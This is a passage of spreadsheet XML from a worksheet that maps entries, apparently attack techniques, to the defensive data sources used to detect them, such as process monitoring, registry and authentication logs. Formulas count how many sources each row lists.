        <v>1251</v>
      </c>
      <c r="D49" s="6">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E49" s="6">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F49" s="6"/>
      <c r="G49" s="6"/>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A50" s="11" t="s">
        <v>110</v>
      </c>
      <c r="B50" s="6" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C50" s="12" t="s">
        <v>1252</v>
      </c>
      <c r="D50" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E50" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F50" s="6"/>
      <c r="G50" s="6"/>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A51" s="11" t="s">
        <v>111</v>
      </c>
      <c r="B51" s="6" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C51" s="12" t="s">
        <v>1238</v>
      </c>
      <c r="D51" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E51" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F51" s="6"/>
      <c r="G51" s="6"/>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A52" s="11" t="s">
        <v>112</v>
      </c>
      <c r="B52" s="6" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C52" s="12" t="s">
        <v>68</v>
      </c>
      <c r="D52" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E52" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F52" s="6"/>
      <c r="G52" s="6"/>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A53" s="11" t="s">
        <v>113</v>
      </c>
      <c r="B53" s="6" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:C)</f>
        <v>Data loss prevention,File monitoring</v>
      </c>
      <c r="C53" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D53" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E53" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F53" s="6"/>
      <c r="G53" s="6"/>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A54" s="11" t="s">
        <v>114</v>
      </c>
      <c r="B54" s="6" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C54" s="12" t="s">
        <v>1254</v>
      </c>
      <c r="D54" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E54" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F54" s="6"/>
      <c r="G54" s="6"/>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A55" s="11" t="s">
        <v>115</v>
      </c>
      <c r="B55" s="6" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C55" s="12" t="s">
        <v>1255</v>
      </c>
      <c r="D55" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E55" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F55" s="6"/>
      <c r="G55" s="6"/>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A56" s="11" t="s">
        <v>116</v>
      </c>
      <c r="B56" s="6" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Windows Registry,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
      </c>
      <c r="C56" s="12" t="s">
        <v>1256</v>
      </c>
      <c r="D56" s="6">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E56" s="6">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F56" s="6"/>
      <c r="G56" s="6"/>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A57" s="11" t="s">
        <v>117</v>
      </c>
      <c r="B57" s="6" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Kernel drivers,Process monitoring,API monitoring</v>
      </c>
      <c r="C57" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="D57" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E57" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F57" s="6"/>
      <c r="G57" s="6"/>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A58" s="11" t="s">
        <v>118</v>
      </c>
      <c r="B58" s="6" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C58" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D58" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E58" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F58" s="6"/>
      <c r="G58" s="6"/>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A59" s="11" t="s">
        <v>119</v>
      </c>
      <c r="B59" s="6" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Services,Windows Registry</v>
      </c>
      <c r="C59" s="12" t="s">
        <v>1258</v>
      </c>
      <c r="D59" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E59" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F59" s="6"/>
      <c r="G59" s="6"/>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A60" s="11" t="s">
        <v>120</v>
      </c>
      <c r="B60" s="6" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C60" s="12" t="s">
        <v>1249</v>
      </c>
      <c r="D60" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E60" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F60" s="6"/>
      <c r="G60" s="6"/>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A61" s="11" t="s">
        <v>121</v>
      </c>
      <c r="B61" s="6" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring</v>
      </c>
      <c r="C61" s="12" t="s">
        <v>1259</v>
      </c>
      <c r="D61" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E61" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F61" s="6"/>
      <c r="G61" s="6"/>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A62" s="11" t="s">
        <v>122</v>
      </c>
      <c r="B62" s="6" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C62" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="D62" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E62" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F62" s="6"/>
      <c r="G62" s="6"/>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A63" s="11" t="s">
        <v>123</v>
      </c>
      <c r="B63" s="6" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
      <c r="C63" s="12">
        <v>100</v>
      </c>
      <c r="D63" s="6">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E63" s="6">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F63" s="6"/>
      <c r="G63" s="6"/>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A64" s="11" t="s">
        <v>124</v>
      </c>
      <c r="B64" s="6" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C64" s="12" t="s">
        <v>1260</v>
      </c>
      <c r="D64" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E64" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F64" s="6"/>
      <c r="G64" s="6"/>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A65" s="11" t="s">
        <v>125</v>
      </c>
      <c r="B65" s="6" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C65" s="12" t="s">
        <v>1261</v>
      </c>
      <c r="D65" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E65" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F65" s="6"/>
      <c r="G65" s="6"/>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A66" s="11" t="s">
        <v>126</v>
      </c>
      <c r="B66" s="6" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C66" s="12" t="s">
        <v>1255</v>
      </c>
      <c r="D66" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E66" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F66" s="6"/>
      <c r="G66" s="6"/>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A67" s="11" t="s">
        <v>127</v>
      </c>
      <c r="B67" s="6" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
      </c>
      <c r="C67" s="12" t="s">
        <v>1234</v>
      </c>
      <c r="D67" s="6">
        <f t="shared" ref="D67:D130" si="3">LEN(TRIM(B67))-LEN(SUBSTITUTE(TRIM(B67),",",""))+1</f>
        <v>5</v>
      </c>
      <c r="E67" s="6">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F67" s="6"/>
      <c r="G67" s="6"/>
    </row>
    <row r="68" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A68" s="11" t="s">
        <v>128</v>
      </c>
      <c r="B68" s="6" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:C)</f>
        <v>API monitoring,MBR,VBR</v>
      </c>
      <c r="C68" s="12" t="s">
        <v>1262</v>
      </c>
      <c r="D68" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E68" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F68" s="6"/>
      <c r="G68" s="6"/>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A69" s="11" t="s">
        <v>129</v>
      </c>
      <c r="B69" s="6" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,Application logs</v>
      </c>
      <c r="C69" s="12" t="s">
        <v>1263</v>
      </c>
      <c r="D69" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E69" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F69" s="6"/>
      <c r="G69" s="6"/>
    </row>
    <row r="70" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A70" s="11" t="s">
        <v>130</v>
      </c>
      <c r="B70" s="6" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C70" s="12" t="s">
        <v>1239</v>
      </c>
      <c r="D70" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E70" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F70" s="6"/>
      <c r="G70" s="6"/>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A71" s="11" t="s">
        <v>131</v>
      </c>
      <c r="B71" s="6" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
      </c>
      <c r="C71" s="12" t="s">
        <v>1234</v>
      </c>
      <c r="D71" s="6">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E71" s="6">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F71" s="6"/>
      <c r="G71" s="6"/>
    </row>
    <row r="72" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A72" s="11" t="s">
        <v>132</v>
      </c>
      <c r="B72" s="6" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C72" s="12" t="s">
        <v>1264</v>
      </c>
      <c r="D72" s="6">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E72" s="6">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F72" s="6"/>
      <c r="G72" s="6"/>
    </row>
    <row r="73" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A73" s="11" t="s">
        <v>133</v>
      </c>
      <c r="B73" s="6" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
      <c r="C73" s="12" t="s">
        <v>1265</v>
      </c>
      <c r="D73" s="6">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E73" s="6">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F73" s="6"/>
      <c r="G73" s="6"/>
    </row>
    <row r="74" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A74" s="11" t="s">
        <v>134</v>
      </c>
      <c r="B74" s="6" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Loaded DLLs</v>
      </c>
      <c r="C74" s="12" t="s">
        <v>1258</v>
      </c>
      <c r="D74" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E74" s="6">
        <f t="shared" ref="E74:E137" si="4">LEN(TRIM(C74))-LEN(SUBSTITUTE(TRIM(C74),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F74" s="6"/>
      <c r="G74" s="6"/>
    </row>
    <row r="75" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A75" s="11" t="s">
        <v>135</v>
      </c>
      <c r="B75" s="6" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C75" s="12" t="s">
        <v>1232</v>
      </c>
      <c r="D75" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E75" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F75" s="6"/>
      <c r="G75" s="6"/>
    </row>
    <row r="76" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A76" s="11" t="s">
        <v>136</v>
      </c>
      <c r="B76" s="6" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C76" s="12">
        <v>100</v>
      </c>
      <c r="D76" s="6">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E76" s="6">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F76" s="6"/>
      <c r="G76" s="6"/>
    </row>
    <row r="77" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A77" s="11" t="s">
        <v>137</v>
      </c>
      <c r="B77" s="6" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C77" s="12" t="s">
        <v>1255</v>
      </c>
      <c r="D77" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E77" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F77" s="6"/>
      <c r="G77" s="6"/>
    </row>
    <row r="78" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A78" s="11" t="s">
        <v>138</v>
      </c>
      <c r="B78" s="6" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Authentication logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C78" s="12" t="s">
        <v>1266</v>
      </c>
      <c r="D78" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E78" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F78" s="6"/>
      <c r="G78" s="6"/>
    </row>
    <row r="79" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A79" s="11" t="s">
        <v>139</v>
      </c>
      <c r="B79" s="6" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Process monitoring</v>
      </c>
      <c r="C79" s="12" t="s">
        <v>1267</v>
      </c>
      <c r="D79" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E79" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F79" s="6"/>
      <c r="G79" s="6"/>
    </row>
    <row r="80" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A80" s="11" t="s">
        <v>140</v>
      </c>
      <c r="B80" s="6" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C80" s="12" t="s">
        <v>1268</v>
      </c>
      <c r="D80" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E80" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F80" s="6"/>
      <c r="G80" s="6"/>
    </row>
    <row r="81" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A81" s="11" t="s">
        <v>141</v>
      </c>
      <c r="B81" s="6" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C81" s="12" t="s">
        <v>1267</v>
      </c>
      <c r="D81" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E81" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F81" s="6"/>
      <c r="G81" s="6"/>
    </row>
    <row r="82" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A82" s="11" t="s">
        <v>142</v>
      </c>
      <c r="B82" s="6" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="C82" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D82" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E82" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F82" s="6"/>
      <c r="G82" s="6"/>
    </row>
    <row r="83" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A83" s="11" t="s">
        <v>143</v>
      </c>
      <c r="B83" s="6" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C83" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D83" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E83" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F83" s="6"/>
      <c r="G83" s="6"/>
    </row>
    <row r="84" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A84" s="11" t="s">
        <v>144</v>
      </c>
      <c r="B84" s="6" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C84" s="12" t="s">
        <v>1232</v>
      </c>
      <c r="D84" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E84" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F84" s="6"/>
      <c r="G84" s="6"/>
    </row>
    <row r="85" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A85" s="11" t="s">
        <v>145</v>
      </c>
      <c r="B85" s="6" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:C)</f>
        <v>WMI Objects</v>
      </c>
      <c r="C85" s="12">
        <v>100</v>
      </c>
      <c r="D85" s="6">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E85" s="6">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F85" s="6"/>
      <c r="G85" s="6"/>
    </row>
    <row r="86" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A86" s="11" t="s">
        <v>146</v>
      </c>
      <c r="B86" s="6" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C86" s="12" t="s">
        <v>1269</v>
      </c>
      <c r="D86" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E86" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F86" s="6"/>
      <c r="G86" s="6"/>
    </row>
    <row r="87" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A87" s="11" t="s">
        <v>147</v>
      </c>
      <c r="B87" s="6" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C87" s="12" t="s">
        <v>1270</v>
      </c>
      <c r="D87" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E87" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F87" s="6"/>
      <c r="G87" s="6"/>
    </row>
    <row r="88" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A88" s="11" t="s">
        <v>148</v>
      </c>
      <c r="B88" s="6" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C88" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D88" s="6">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E88" s="6">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F88" s="6"/>
      <c r="G88" s="6"/>
    </row>
    <row r="89" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A89" s="11" t="s">
        <v>149</v>
      </c>
      <c r="B89" s="6" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring,Authentication logs,Process command-line parameters</v>
      </c>
      <c r="C89" s="12" t="s">
        <v>1271</v>
      </c>
      <c r="D89" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E89" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F89" s="6"/>
      <c r="G89" s="6"/>
    </row>
    <row r="90" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A90" s="11" t="s">
        <v>150</v>
      </c>
      <c r="B90" s="6" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Services,Windows Registry,Process command-line parameters,Anti-virus</v>
      </c>
      <c r="C90" s="12" t="s">
        <v>1272</v>
      </c>
      <c r="D90" s="6">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E90" s="6">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F90" s="6"/>
      <c r="G90" s="6"/>
    </row>
    <row r="91" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A91" s="11" t="s">
        <v>151</v>
      </c>
      <c r="B91" s="6" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C91" s="12" t="s">
        <v>1273</v>
      </c>
      <c r="D91" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E91" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F91" s="6"/>
      <c r="G91" s="6"/>
    </row>
    <row r="92" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A92" s="11" t="s">
        <v>152</v>
      </c>
      <c r="B92" s="6" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C92" s="12" t="s">
        <v>68</v>
      </c>
      <c r="D92" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E92" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F92" s="6"/>
      <c r="G92" s="6"/>
    </row>
    <row r="93" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A93" s="11" t="s">
        <v>153</v>
      </c>
      <c r="B93" s="6" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C93" s="12" t="s">
        <v>68</v>
      </c>
      <c r="D93" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E93" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F93" s="6"/>
      <c r="G93" s="6"/>
    </row>
    <row r="94" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A94" s="11" t="s">
        <v>154</v>
      </c>
      <c r="B94" s="6" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,API monitoring</v>
      </c>
      <c r="C94" s="12" t="s">
        <v>68</v>
      </c>
      <c r="D94" s="6">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E94" s="6">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F94" s="6"/>
      <c r="G94" s="6"/>
    </row>
    <row r="95" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A95" s="11" t="s">
        <v>155</v>
      </c>
      <c r="B95" s="6" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Host network interface,Network intrusion detection system,Network protocol analysis</v>
      </c>
      <c r="C95" s="12" t="s">
        <v>1274</v>
      </c>
      <c r="D95" s="6">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E95" s="6">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="F95" s="6"/>
      <c r="G95" s="6"/>
    </row>
    <row r="96" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A96" s="11" t="s">
        <v>156</v>
      </c>
      <c r="B96" s="6" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C96" s="12" t="s">
        <v>1275</v>
      </c>
      <c r="D96" s="6">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E96" s="6">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F96" s="6"/>
      <c r="G96" s="6"/>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A97" s="11" t="s">
        <v>157</v>
      </c>
      <c r="B97" s="6" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Kernel drivers,API monitoring,Process command-line parameters</v>
      </c>
      <c r="C97" s="12" t="s">
        <v>1276</v>
      </c>
      <c r="D97" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E97" s="6">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F97" s="6"/>
      <c r="G97" s="6"/>
    </row>
    <row r="98" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A98" s="11" t="s">
        <v>158</v>
      </c>
      <c r="B98" s="6" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C98" s="12">
        <v>100</v>
      </c>
      <c r="D98" s="6">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E98" s="6">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F98" s="6"/>
      <c r="G98" s="6"/>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A99" s="11" t="s">
        <v>159</v>
      </c>
      <c r="B99" s="6" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,API monitoring,Windows event logs,Packet capture</v>
      </c>
      <c r="C99" s="12" t="s">
        <v>1250</v>
      </c>
      <c r="D99" s="6">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E99" s="6">
